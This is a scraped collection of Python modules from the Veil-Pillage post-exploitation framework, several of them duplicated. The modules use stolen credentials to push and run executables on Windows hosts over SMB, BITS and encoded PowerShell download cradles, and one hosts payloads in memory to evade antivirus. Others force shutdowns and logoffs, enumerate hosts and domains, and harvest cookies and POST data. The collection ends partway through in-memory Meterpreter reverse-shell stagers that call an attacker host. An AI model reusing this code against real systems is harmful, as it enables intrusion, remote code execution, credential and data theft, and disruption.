コード例 #1
0
ファイル: netview.py プロジェクト: AlTune/Veil-Pillage
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        # grab our options
        triggerMethod = self.required_options["trigger_method"][0]
        out_file = self.required_options["out_file"][0]
        args = self.required_options["args"][0]

        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file 

        # command to invoke netview and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/netview.exe"

        # the command to invoke netview.exe
        cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file

        # see if there are any extra arguments we want to add in
        if args != "none":
            cmd = cmd + " " + args

        for target in self.targets:
 
            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            
            # execute netview.exe
            command_methods.executeCommand(target, username, password, cmd, triggerMethod)

            self.output += "[*] netview.exe uploaded and executed using creds '"+username+":"+password+"' on "+target+" using "+triggerMethod+"\n"
コード例 #2
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        exe_url = self.required_options["exe_url"][0]
        interval = self.required_options["interval"][0]
        job_name = self.required_options["job_name"][0]
        triggerMethod = "winexe"

        # create the bitsadmin job, set the retry interval, kick everything off
        cmd = "bitsadmin /create " + job_name + " & bitsadmin /addfile " + job_name + " " + exe_url + " C:\Windows\Temp\updater.exe & bitsadmin /SETNOTIFYCMDLINE " + job_name + " C:\Windows\Temp\updater.exe NULL & bitsadmin /SETMINRETRYDELAY " + job_name + " " + str(
            int(interval) * 60) + " & bitsadmin /resume " + job_name

        # bitsadmin cleanup -> cancel this specific job
        cleanupCMD = "bitsadmin /cancel " + job_name

        for target in self.targets:

            self.output += "[*] Bitsadmin job started with url " + exe_url + " using creds '" + username + ":" + password + "' on " + target + "\n"

            command_methods.executeCommand(target,
                                           username,
                                           password,
                                           cmd,
                                           triggerMethod=triggerMethod)
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
コード例 #3
0
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
    """
    Take a particular exe at "exePath" path and uploads it to each 
    target in targets, using the specified username and password.

    The specified triggerMethod (default wmis) is then used to trigger the
    uploaded executable.

    """

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the uploaded .exe file name
    uploadFileName = helpers.randomString() + ".exe"

    # copy the payload to the random hostedFileName in the temp directory
    os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName)

    # command to trigger the uploaded executable
    cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs

    for target in targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5)
        
        # execute the trigger command
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    # return the randomized name in the calling method later wants
    # to clean the processes up
    return uploadFileName
コード例 #4
0
ファイル: finddllhijack.py プロジェクト: AlTune/Veil-Pillage
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # command to invoke finddllhijack and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
        cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:
 
            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            
            # execute finddllhijack and get the results
            out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
        
            # cleanup 
            command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

            if out != "":
                self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
コード例 #5
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        # grab our options
        triggerMethod = self.required_options["trigger_method"][0]
        out_file = self.required_options["out_file"][0]
        args = self.required_options["args"][0]

        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file

        # command to invoke netview and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

        # the command to invoke netview.exe
        cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file

        # see if there are any extra arguments we want to add in
        if args != "none":
            cmd = cmd + " " + args

        for target in self.targets:

            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$",
                           "\\Windows\\Temp\\", exePath)

            # execute netview.exe
            command_methods.executeCommand(target, username, password, cmd,
                                           triggerMethod)

            self.output += "[*] netview.exe uploaded and executed using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
コード例 #6
0
def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""):
    """
    Spins up an Impacket SMB server and hosts the binary specified by exePath.
    The specified triggerMethod (default wmis) is then used to invoke a command
    with the UNC path "\\localHost\\exe" which will invoke the specified
    executable purely in memory.

    Note: this evades several AV vendors, even with normally disk-detectable
    executables #avlol :)

    This takes 'targets' instead of a single 'target' since we don't want to set up
    and tear down the local SMB server every time.
    """

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the hosted .exe file name
    hostedFileName = helpers.randomString() + ".exe"

    # make the tmp hosting directory if it doesn't already exist
    if not os.path.exists(settings.TEMP_DIR + "shared/"): 
        os.makedirs(settings.TEMP_DIR + "shared/")

    # copy the payload to the random hostedFileName in the temp directory
    os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/shared/" + hostedFileName)

    # spin up the SMB server 
    server = smb.ThreadedSMBServer()
    server.start()
    time.sleep(.5)

    # build the UNC path back to our host and executable and any specified arguments
    cmd = "\\\\" + localHost + "\\system\\" + hostedFileName+" "+exeArgs

    for target in targets:
        # execute the UNC command for each target
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    print helpers.color("\n [*] Giving time for commands to trigger...")
    # sleep so the wmis/winexe commands can trigger and the target
    # can grab the .exe from the SMB server
    time.sleep(10)

    # shut the smb server down
    server.shutdown()

    # remove the temporarily hosted files
    os.system("rm -rf " + settings.TEMP_DIR+"/shared/")

    # not sure if need to do this to kill off the smb server...
    # os.kill(os.getpid(), signal.SIGINT) ?

    # return the randomized name in the calling method later wants
    # to clean the processes up
    return hostedFileName
コード例 #7
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload(
                [self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on " +
                                target)

            # execute the powershell command on each host
            command_methods.executeCommand(target, username, password,
                                           powershellCommand, triggerMethod)

            self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
コード例 #8
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")


        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on "+target)

            # execute the powershell command on each host
            command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)

            self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
コード例 #9
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # reg.exe command to shutdown a machine immediately
            command = "shutdown -t 0 -s -f"
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)

            if "success" in result:
                self.output += (
                    "[*] Shutdown command successfully triggered using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
            else:
                self.output += (
                    "[!] Shutdown command unsuccessful using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
コード例 #10
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        outFile = self.required_options["out_file"][0]

        if "\\" not in outFile:
            # otherwise assume it's an absolute path
            outFile = "C:\\Windows\\Temp\\" + outFile 

        for target in self.targets:

            targetUsernames = []

            command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile}

            # execute the command
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)

            # wait 20 seconds for "systeminfo" to run
            print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
            time.sleep(20)

            # # grab the output file and delete it
            out = smb.getFile(target, username, password, outFile, delete=True)

            if out != "":
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out)
                self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
コード例 #11
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        for target in self.targets:

            # stop the ETW
            stopCMD = "logman stop Status32 -ets"
            command_methods.executeCommand(target, username, password, stopCMD,
                                           triggerMethod)

            # search for cookies or POST paramters
            if flag.lower() == "post":
                flag = "POST"
                moduleFile = "post_params.txt"
            else:
                flag = "cookie added"
                moduleFile = "cookies.txt"

            # check the ETW results for the specified flag, and delete the dump file
            parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""

            # wait 20 seconds for everything to parse...if errors happen, increase this
            parseResult = command_methods.executeResult(target,
                                                        username,
                                                        password,
                                                        parseCmd,
                                                        triggerMethod,
                                                        pause=20)

            # delete the trace file
            delCmd = "del C:\\Windows\\Temp\\status32.etl"
            command_methods.executeCommand(target, username, password, delCmd,
                                           triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, moduleFile,
                                                  parseResult)
                self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
コード例 #12
0
def powershellTrigger(targets,
                      username,
                      password,
                      url,
                      scriptArguments="",
                      triggerMethod="wmis",
                      outFile=None,
                      noArch=False):
    """
    Trigger a specific url to download a powershell script from.

    url                 - the full url (http/https) to download the second stage script from
    scriptArguments     - the arguments to pass to the script we're invoking
    outFile             - if you want to the script to output to a file for later retrieval, put a path here
    noArch              - don't do the arch-independent launcher
    """

    # this surpasses the length-limit implicit to smbexec I'm afraid :(
    if triggerMethod.lower() == "smbexec":
        print helpers.color(
            "\n\n [!] Error: smbexec will not work with powershell invocation",
            warning=True)
        raw_input(" [*] press any key to return: ")
        return ""

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # if the url doesn't start with http/https, assume http
    if not url.lower().startswith("http"):
        url = "http://" + url

    if scriptArguments.lower() == "none": scriptArguments = ""

    # powershell command to download/execute our secondary stage,
    #   plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
    # for https, be sure to turn off warnings for self-signed certs in case we're hosting
    if url.lower().startswith("https"):
        downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments

    else:
        downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments

    # get the encoded powershell command
    triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)

    # if we want to get output from the final execution, append it
    if outFile: triggerCMD += " > " + outFile

    # execute the powershell trigger command on each target
    for target in targets:
        print "\n [*] Executing command on " + target
        out = command_methods.executeCommand(target, username, password,
                                             triggerCMD, triggerMethod)
コード例 #13
0
def uploadTrigger(targets,
                  username,
                  password,
                  exePath,
                  triggerMethod="wmis",
                  exeArgs=""):
    """
    Take a particular exe at "exePath" path and uploads it to each 
    target in targets, using the specified username and password.

    The specified triggerMethod (default wmis) is then used to trigger the
    uploaded executable.

    """

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the uploaded .exe file name
    uploadFileName = helpers.randomString() + ".exe"

    # copy the payload to the random hostedFileName in the temp directory
    os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/" +
              uploadFileName)

    # command to trigger the uploaded executable
    cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs

    for target in targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\",
                       settings.TEMP_DIR + "/" + uploadFileName, 5)

        # execute the trigger command
        command_methods.executeCommand(target, username, password, cmd,
                                       triggerMethod)

    # return the randomized name in the calling method later wants
    # to clean the processes up
    return uploadFileName
コード例 #14
0
ファイル: bitsadmin.py プロジェクト: AlTune/Veil-Pillage
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        exe_url = self.required_options["exe_url"][0]
        interval = self.required_options["interval"][0]
        job_name = self.required_options["job_name"][0]
        triggerMethod = "winexe"
        
        # create the bitsadmin job, set the retry interval, kick everything off
        cmd = "bitsadmin /create "+job_name+" & bitsadmin /addfile "+job_name+" "+exe_url+" C:\Windows\Temp\updater.exe & bitsadmin /SETNOTIFYCMDLINE "+job_name+" C:\Windows\Temp\updater.exe NULL & bitsadmin /SETMINRETRYDELAY "+job_name+" "+str(int(interval)*60) + " & bitsadmin /resume "+job_name

        # bitsadmin cleanup -> cancel this specific job
        cleanupCMD = "bitsadmin /cancel "+job_name

        for target in self.targets:

            self.output += "[*] Bitsadmin job started with url "+exe_url+" using creds '"+username+":"+password+"' on " + target + "\n"

            command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod)
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
コード例 #15
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # command to invoke finddllhijack and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:

            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$",
                           "\\Windows\\Temp\\", exePath)

            # execute finddllhijack and get the results
            out = command_methods.executeResult(target,
                                                username,
                                                password,
                                                cmd,
                                                triggerMethod,
                                                pause=5)

            # cleanup
            command_methods.executeCommand(
                target, username, password,
                "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target,
                                              "finddllhijack.txt", out)

            if out != "":
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
コード例 #16
0
ファイル: etw_results.py プロジェクト: AlTune/Veil-Pillage
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        for target in self.targets:

            # stop the ETW
            stopCMD = "logman stop Status32 -ets"
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

            # search for cookies or POST paramters
            if flag.lower() == "post":
                flag = "POST"
                moduleFile = "post_params.txt"
            else:
                flag = "cookie added"
                moduleFile = "cookies.txt"

            # check the ETW results for the specified flag, and delete the dump file
            parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
            
            # wait 20 seconds for everything to parse...if errors happen, increase this
            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

            # delete the trace file
            delCmd = "del C:\\Windows\\Temp\\status32.etl"
            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
                self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
コード例 #17
0
ファイル: force_logoff.py プロジェクト: AlTune/Veil-Pillage
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
            
            # reg.exe command to force the logoff of the first user result from "query user"
            command = "logoff 1"
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)

            if "success" in result:
                self.output += "[*] Logoff command successfully triggered using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                self.output += "[!] Logoff command unsuccessful using creds '"+username+":"+password+"' on : " + target + "\n"
コード例 #18
0
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False):
    """
    Trigger a specific url to download a powershell script from.

    url                 - the full url (http/https) to download the second stage script from
    scriptArguments     - the arguments to pass to the script we're invoking
    outFile             - if you want to the script to output to a file for later retrieval, put a path here
    noArch              - don't do the arch-independent launcher
    """

   # this surpasses the length-limit implicit to smbexec I'm afraid :(
    if triggerMethod.lower() == "smbexec":
        print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
        raw_input(" [*] press any key to return: ")
        return ""

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # if the url doesn't start with http/https, assume http
    if not url.lower().startswith("http"):
        url = "http://" + url

    if scriptArguments.lower() == "none": scriptArguments = ""

    # powershell command to download/execute our secondary stage,
    #   plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
    # for https, be sure to turn off warnings for self-signed certs in case we're hosting
    if url.lower().startswith("https"):
        downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
        
    else:
        downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments

    # get the encoded powershell command
    triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)

    # if we want to get output from the final execution, append it
    if outFile: triggerCMD += " > " + outFile

    # execute the powershell trigger command on each target
    for target in targets:
        print "\n [*] Executing command on "+target
        out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
コード例 #19
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # reg.exe command to shutdown a machine immediately
            command = "shutdown -t 0 -s -f"
            result = command_methods.executeCommand(target, username, password,
                                                    command, triggerMethod)

            if "success" in result:
                self.output += "[*] Shutdown command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                self.output += "[!] Shutdown command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
コード例 #20
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # reg.exe command to force the logoff of the first user result from "query user"
            command = "logoff 1"
            result = command_methods.executeCommand(target, username, password,
                                                    command, triggerMethod)

            if "success" in result:
                self.output += "[*] Logoff command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                self.output += "[!] Logoff command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
コード例 #21
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        outFile = self.required_options["out_file"][0]

        # wmis doesn't like net * /domain commands >_<
        triggerMethod = "winexe"

        if "\\" not in outFile:
            # otherwise assume it's an absolute path
            outFile = "C:\\Windows\\Temp\\" + outFile

        for target in self.targets:

            targetUsernames = []

            command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % {
                "p": outFile
            }

            # execute the command
            result = command_methods.executeCommand(target, username, password,
                                                    command, triggerMethod)

            # wait 20 seconds for commands to run
            print helpers.color(
                "\n [*] Waiting 20 seconds for enumeration commands to run on '"
                + target + "'",
                status=True)
            time.sleep(20)

            # # grab the output file and delete it
            out = smb.getFile(target, username, password, outFile, delete=True)

            if out != "":
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target,
                                                  "enum_domain.txt", out)
                self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
コード例 #22
0
ファイル: enum_domain.py プロジェクト: AlTune/Veil-Pillage
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        outFile = self.required_options["out_file"][0]

        # wmis doesn't like net * /domain commands >_<
        triggerMethod = "winexe"

        if "\\" not in outFile:
            # otherwise assume it's an absolute path
            outFile = "C:\\Windows\\Temp\\" + outFile 

        for target in self.targets:

            targetUsernames = []

            command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile}

            # execute the command
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)

            # wait 20 seconds for commands to run
            print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
            time.sleep(20)

            # # grab the output file and delete it
            out = smb.getFile(target, username, password, outFile, delete=True)

            if out != "":
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
                self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
コード例 #23
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        stager = self.required_options["stager"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # start building the handler in case we want to invoke it
        handler = "use exploit/multi/handler"

        # the pure powershell windows/meterpreter/reverse_tcp stager
        revTCPStager = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport)

        # the pure powershell windows/meterpreter/reverse_http stager
        revHTTPStager = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")
$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport)

        # the pure powershell windows/meterpreter/reverse_https stager
        revHTTPSStager = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;
$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
